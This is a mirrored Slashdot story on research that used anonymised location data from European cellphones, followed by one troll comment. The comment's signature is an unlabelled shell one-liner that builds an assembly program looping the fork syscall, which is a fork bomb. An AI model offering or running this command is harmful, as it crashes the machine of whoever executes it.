Slashdot Mirror


Cell Phone Tracking Reveals Users' Habits

DinkyDogg writes "'New research that makes creative use of sensitive location-tracking data from 100,000 cellphones in Europe suggests that most people can be found in one of just a few locations at any time, and that they do not generally go far from home.' More interesting than their conclusion, however, is how they got their data. 'The researchers said they used the potentially controversial data only after any information that could identify individuals had been scrambled. Even so, they wrote, people's wanderings are so subject to routine that by using the patterns of movement that emerged from the research, "we can obtain the likelihood of finding a user in any location." The researchers were able to obtain the data from a European provider of cellphone service that was obligated to collect the information. By agreement with the company, the researchers did not disclose the country where the provider operates.' Any guesses which European country requires cell phone providers to record where their customers make calls, and then allows them to give that data away without disclosing that they have done so?"

1 of 180 comments (clear)

  1. Re:Well, there goes the myth of the EU saner than by Hal_Porter · · Score: 0, Troll

    so, when are you voting out the people who did this? at least most western nations outside the US have more choices than tweedle-dee and tweedle-dum Hey tweedle-dee is about change. People that support tweedle-dum are worse than Nazis.
    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;